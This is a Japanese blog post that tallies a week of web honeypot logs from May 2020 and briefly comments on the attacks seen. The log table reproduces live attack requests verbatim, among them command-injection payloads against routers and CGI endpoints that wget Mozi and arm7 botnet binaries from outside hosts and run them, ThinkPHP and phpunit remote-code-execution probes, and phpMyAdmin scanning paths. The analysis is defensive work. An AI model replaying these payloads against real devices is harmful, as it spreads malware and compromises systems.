家studyをつづって

IT技術やセキュリティで勉強したことをつづっています。

Wowhoneypotログ分析（2020/05/11-2020/05/17）

概要

以前の記事で構築したWowhoneypotのログを集計した結果です。

対象期間

2020/05/11-2020/05/17

ログの集計

送信元	内容	検知数
		0
110.154.182.132	\"GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/¤tsetting.htm=1	1
111.231.142.223	\"GET /TP/public/index.php	1
	\"GET /TP/public/index.php?s=index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1]=1	1
	\"POST /TP/public/index.php?s=captcha	1
113.173.214.13	\"GET /operator/basic.shtml?id=1337	1
	\"GET /sess-bin/login_session.cgi	2
	\"GET /setup.cgi	2
	\"GET /shell?/bin/busybox+ABCD	3
	\"POST /doLogin	1
115.134.25.118	\"POST /cgi-bin/mainfunction.cgi	1
116.207.220.101	\"POST /cgi-bin/mainfunction.cgi	2
12.175.89.10	\"POST /cgi-bin/mainfunction.cgi	1
124.118.64.244	\"GET /shell?cd+/tmp;rm+-rf+*;wget+http://172.45.29.4:36758/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws	1
125.14.48.207	\"GET /favicon.ico	2
134.255.234.161	\"GET /phpMyAdmin/scripts/setup.php	13
	\"POST /phpMyAdmin/scripts/setup.php	13
14.241.249.199	\"POST /cgi-bin/mainfunction.cgi	1
141.105.87.106	\"POST /boaform/admin/formPing	1
141.237.69.118	\"GET /shell?cd+/tmp;rm+-rf+*;wget+%20172.245.52.231/jaws;sh+/tmp/jaws	1
151.99.146.218	\"POST /cgi-bin/mainfunction.cgi?action=login&keyPath=%27%0A/bin/sh${IFS}-c${IFS}'cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}arm7;${IFS}busybox${IFS}wget${IFS}http://19ce033f.ngrok.io/arm7;${IFS}chmod${IFS}777${IFS}arm7;${IFS}./arm7'%0A%27&loginUser=a&loginPwd=a	1
154.126.79.223	\"GET /adv	2
156.96.155.242	\"GET /admin/	2
	\"GET /agSearch/SQlite/main.php	2
	\"GET /dbadmin/	2
	\"GET /HNAP1/	2
	\"GET /hudson/script	2
	\"GET /main.php	2
	\"GET /myadmin/	2
	\"GET /mysql-admin/	2
	\"GET /mysql/	2
	\"GET /mysqladmin/	2
	\"GET /mysqlmanager/	2
	\"GET /openserver/phpmyadmin/	2
	\"GET /p/m/a/	2
	\"GET /php-my-admin/	2
	\"GET /php-myadmin/	2
	\"GET /phpmanager/	2
	\"GET /phpmy-admin/	2
	\"GET /phpMyAdmin-2.2.3/	2
	\"GET /phpMyAdmin-2.2.6/	2
	\"GET /phpMyAdmin-2.5.1/	2
	\"GET /phpMyAdmin-2.5.4/	2
	\"GET /phpMyAdmin-2.5.5-pl1/	2
	\"GET /phpMyAdmin-2.5.5-rc1/	2
	\"GET /phpMyAdmin-2.5.5-rc2/	2
	\"GET /phpMyAdmin-2.5.5/	2
	\"GET /phpMyAdmin-2.5.6-rc1/	2
	\"GET /phpMyAdmin-2.5.6-rc2/	2
	\"GET /phpMyAdmin-2.5.6/	2
	\"GET /phpMyAdmin-2.5.7-pl1/	2
	\"GET /phpMyAdmin-2.5.7/	2
	\"GET /phpMyAdmin-2.6.0-alpha/	2
	\"GET /phpMyAdmin-2.6.0-alpha2/	2
	\"GET /phpMyAdmin-2.6.0-beta1/	2
	\"GET /phpMyAdmin-2.6.0-beta2/	2
	\"GET /phpMyAdmin-2.6.0-pl1/	2
	\"GET /phpMyAdmin-2.6.0-pl2/	2
	\"GET /phpMyAdmin-2.6.0-pl3/	2
	\"GET /phpMyAdmin-2.6.0-rc1/	2
	\"GET /phpMyAdmin-2.6.0-rc2/	2
	\"GET /phpMyAdmin-2.6.0-rc3/	2
	\"GET /phpMyAdmin-2.6.0/	2
	\"GET /phpMyAdmin-2.6.1-pl1/	2
	\"GET /phpMyAdmin-2.6.1-pl2/	2
	\"GET /phpMyAdmin-2.6.1-pl3/	2
	\"GET /phpMyAdmin-2.6.1-rc1/	2
	\"GET /phpMyAdmin-2.6.1-rc2/	2
	\"GET /phpMyAdmin-2.6.1/	2
	\"GET /phpMyAdmin-2.6.2-beta1/	2
	\"GET /phpMyAdmin-2.6.2-pl1/	2
	\"GET /phpMyAdmin-2.6.2-rc1/	4
	\"GET /phpMyAdmin-2.6.2/	2
	\"GET /phpMyAdmin-2.6.3-pl1/	2
	\"GET /phpMyAdmin-2.6.3-rc1/	2
	\"GET /phpMyAdmin-2.6.3/	4
	\"GET /phpMyAdmin-2.6.4-pl1/	2
	\"GET /phpMyAdmin-2.6.4-pl2/	2
	\"GET /phpMyAdmin-2.6.4-pl3/	2
	\"GET /phpMyAdmin-2.6.4-pl4/	2
	\"GET /phpMyAdmin-2.6.4-rc1/	2
	\"GET /phpMyAdmin-2.6.4/	2
	\"GET /phpMyAdmin-2.7.0-beta1/	2
	\"GET /phpMyAdmin-2.7.0-pl1/	2
	\"GET /phpMyAdmin-2.7.0-pl2/	2
	\"GET /phpMyAdmin-2.7.0-rc1/	2
	\"GET /phpMyAdmin-2.7.0/	2
	\"GET /phpMyAdmin-2.8.0-beta1/	2
	\"GET /phpMyAdmin-2.8.0-rc1/	2
	\"GET /phpMyAdmin-2.8.0-rc2/	2
	\"GET /phpMyAdmin-2.8.0.1/	2
	\"GET /phpMyAdmin-2.8.0.2/	2
	\"GET /phpMyAdmin-2.8.0.3/	2
	\"GET /phpMyAdmin-2.8.0.4/	2
	\"GET /phpMyAdmin-2.8.0/	2
	\"GET /phpMyAdmin-2.8.1-rc1/	2
	\"GET /phpMyAdmin-2.8.1/	2
	\"GET /phpMyAdmin-2.8.2/	2
	\"GET /phpMyAdmin-2/	2
	\"GET /phpmyadmin/	4
	\"GET /phpmyadmin2/	4
	\"GET /PMA/	4
	\"GET /PMA2005/	4
	\"GET /script	2
	\"GET /sqlite/main.php	6
	\"GET /SQLiteManager-1.2.4/main.php	2
	\"GET /sqlitemanager/main.php	4
	\"GET /sqlmanager/	2
	\"GET /sqlweb/	2
	\"GET /test/sqlite/SQLiteManager-1.2.0/SQLiteManager-1.2.0/main.php	2
	\"GET /webadmin/	2
	\"GET /webdb/	2
	\"GET /websql/	2
	\"GET http://www.msftncsi.com/ncsi.txt	2
162.243.135.71	\"GET /hudson	1
162.243.140.80	\"GET /portal/redlion	1
162.243.142.207	\"GET /hudson	1
162.243.144.106	\"GET /portal/redlion	1
162.243.144.196	\"GET /hudson	1
162.243.144.204	\"GET /ReportServer	1
170.246.149.166	\"POST /cgi-bin/mainfunction.cgi	1
173.215.49.220	\"POST /cgi-bin/mainfunction.cgi	1
175.136.165.166	\"GET /operator/basic.shtml?id=1337	1
	\"GET /sess-bin/login_session.cgi	1
176.113.161.89	\"POST /GponForm/diag_Form?images/	1
181.129.133.164	\"POST /cgi-bin/mainfunction.cgi	1
181.169.232.175	\"POST /cgi-bin/mainfunction.cgi?action=login&keyPath=%27%0A/bin/sh${IFS}-c${IFS}'cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}arm7;${IFS}busybox${IFS}wget${IFS}http://192.3.45.185/arm7;${IFS}chmod${IFS}777${IFS}arm7;${IFS}./arm7'%0A%27&loginUser=a&loginPwd=a	1
185.128.41.50	\"GET /manager/html	181
185.176.27.114	\"GET /favicon.ico	1
	\"GET /robots.txt	1
190.217.1.21	\"POST /cgi-bin/mainfunction.cgi	1
194.127.172.192	\"GET //Admin/scripts/setup.php	5
	\"GET //myadmin/scripts/setup.php	10
	\"GET //phpMyAdmin/scripts/setup.php	10
	\"GET //pma/scripts/setup.php	5
	\"GET /muieblackcat	5
194.190.49.175	\"POST /cgi-bin/mainfunction.cgi	1
195.54.160.121	\"GET /?a=fetch&content=<php>die(@md5(HelloThinkCMF))</php>	9
	\"GET /?XDEBUG_SESSION_START=phpstorm	9
	\"GET /index.php?s=/Index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1]=HelloThinkPHP	8
	\"GET /solr/admin/info/system?wt=json	9
	\"GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php	3
	\"POST /api/jsonws/invoke	8
	\"POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php	2
195.54.160.123	\"GET /?a=fetch&content=<php>die(@md5(HelloThinkCMF))</php>	1
	\"GET /?XDEBUG_SESSION_START=phpstorm	1
	\"GET /index.php?s=/Index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1]=HelloThinkPHP	1
	\"GET /solr/admin/info/system?wt=json	1
	\"GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php	1
	\"POST /api/jsonws/invoke	1
	\"POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php	1
196.3.200.96	\"POST /cgi-bin/mainfunction.cgi	1
198.20.103.178	\"GET /login.html	1
2.42.46.214	\"POST /cgi-bin/mainfunction.cgi	1
2.50.125.47	\"POST /cgi-bin/mainfunction.cgi?action=login&keyPath=%27%0A/bin/sh${IFS}-c${IFS}'cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}arm7;${IFS}busybox${IFS}wget${IFS}http://19ce033f.ngrok.io/arm7;${IFS}chmod${IFS}777${IFS}arm7;${IFS}./arm7'%0A%27&loginUser=a&loginPwd=a	1
201.142.204.200	\"POST /cgi-bin/mainfunction.cgi	1
202.3.134.174	\"GET /login.htm	1
202.40.191.116	\"GET /TP/public/index.php	1
	\"GET /TP/public/index.php?s=index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1]=1	1
	\"POST /TP/public/index.php?s=captcha	1
206.225.74.190	\"POST /cgi-bin/mainfunction.cgi	1
223.155.167.162	\"GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws	1
223.155.182.227	\"POST /GponForm/diag_Form?images/	1
27.74.251.241	\"POST /cgi-bin/mainfunction.cgi?action=login&keyPath=%27%0A/bin/sh${IFS}-c${IFS}'cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}arm7;${IFS}busybox${IFS}wget${IFS}http://19ce033f.ngrok.io/arm7;${IFS}chmod${IFS}777${IFS}arm7;${IFS}./arm7'%0A%27&loginUser=a&loginPwd=a	1
41.204.75.106	\"POST /cgi-bin/mainfunction.cgi	2
41.251.206.70	\"POST /cgi-bin/mainfunction.cgi	1
41.41.153.43	\"POST /cgi-bin/mainfunction.cgi	1
45.13.93.82	\"CONNECT ip.ws.126.net:443	2
45.13.93.90	\"CONNECT ip.ws.126.net:443	2
49.233.186.160	\"GET /TP/public/index.php	1
	\"GET /TP/public/index.php?s=index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1]=1	1
	\"POST /TP/public/index.php?s=captcha	1
49.49.242.97	\"GET /manager/html	1
49.70.190.45	\"POST /GponForm/diag_Form?images/	1
5.101.0.209	\"GET /?a=fetch&content=<php>die(@md5(HelloThinkCMF))</php>	2
	\"GET /?XDEBUG_SESSION_START=phpstorm	2
	\"GET /index.php?s=/Index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1]=HelloThinkPHP	2
	\"GET /solr/admin/info/system?wt=json	2
	\"GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php	2
	\"POST /api/jsonws/invoke	2
	\"POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php	2
51.158.168.21	\"GET /*	1
	\"GET /form	1
	\"GET /helpz	1
	\"GET /httpz	1
	\"GET /loginz	1
	\"GET /statusz	2
68.183.93.200	\"GET /myadmin/scripts/setup.php	2
	\"GET /phpMyAdmin/scripts/setup.php	2
	\"GET /pma/scripts/setup.php	1
	\"GET /w00tw00t.at.blackhats.romanian.anti-sec:)	1
68.71.66.207	\"POST /cgi-bin/mainfunction.cgi	1
72.138.37.2	\"POST /cgi-bin/mainfunction.cgi	1
77.247.108.77	\"GET /admin/	1
80.82.78.104	\"POST /editBlackAndWhiteList	1
81.29.192.212	\"GET /bc9615d267dba809638d9fbc9eb55236.php	1
	\"GET /D90A75ABEFF190F2A31DA59546864E43.php	1
	\"GET /dbf772166781764452a2d50883ed1d63.php	1
	\"GET /phpmyadmin/index.php	2

コメント

NetGear　DGN1000に対するリモートからのコード実行
\"GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/¤tsetting.htm=1

www.exploit-db.com
「GET /manager/html」を181回検知している。（前の期間では514回）
上記はApache Tomcatに対する攻撃と推測。増えた理由は不明。
全体的にPHPの開発環境に対する攻撃が多い。
「muieblackcat」は、ウクライナ（？）で盛んなボットで、PHPの脆弱性を探索する攻撃らしい。

qastack.jp